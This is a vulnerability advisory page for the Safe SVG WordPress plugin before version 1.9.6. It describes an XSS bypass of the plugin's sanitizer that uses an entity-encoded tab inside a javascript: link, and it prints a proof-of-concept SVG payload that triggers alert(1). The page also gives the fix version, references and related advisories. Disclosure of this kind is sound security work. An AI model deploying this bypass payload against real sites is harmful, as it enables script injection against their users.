Safe SVG < 1.9.6 – XSS Protection Bypass | Plugin Vulnerabilities

Description

By using entities in payload XSS will success to bypass the protection of the Safe SVG Plugin

Proof of Concept

Video POC (for <= 1.9.4): https://drive.google.com/open?id=19-sin0HB97L0tPMUAaGjgE5KjP4lXSuw

Create a SVG with payload below to trigger XSS:
```<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(1)">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg> ```

Video PoC for v1.9.5 : https://www.youtube.com/watch?v=hnQA2hc-4_k

Affects Plugins

Fixed in 1.9.6

References

URL

https://github.com/darylldoyle/svg-sanitizer/issues/31

URL

https://github.com/darylldoyle/safe-svg/issues/9

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

0xd0ff9

Submitter

0xd0ff9

Submitter website

http://0xd0ff9.wordpress.com

Submitter twitter

https://twitter.com/Jok3rDb

Verified

No

WPVDB ID

a23e3629-c6d7-478a-9c74-0f3d27430216

Timeline

Publicly Published

2019-11-08 (about 6 years ago)

Added

2019-11-08 (about 6 years ago)

Last Updated

2019-11-28 (about 6 years ago)

Other

Published

Title

Published

2025-11-18

Title

Custom Admin Menu <= 1.0.0 - Reflected XSS

Published

2025-01-21

Title

Picture Gallery – Frontend Image Uploads, AJAX Photo List < 1.5.20 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-11-28

Title

WP Find Your Nearest <= 0.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-10-12

Title

WP 5.6-6.3.1 - Reflected XSS via Application Password Requests

Published

2025-01-03

Title

Piotnet Addons For Elementor < 2.4.32 - Contributor+ Stored XSS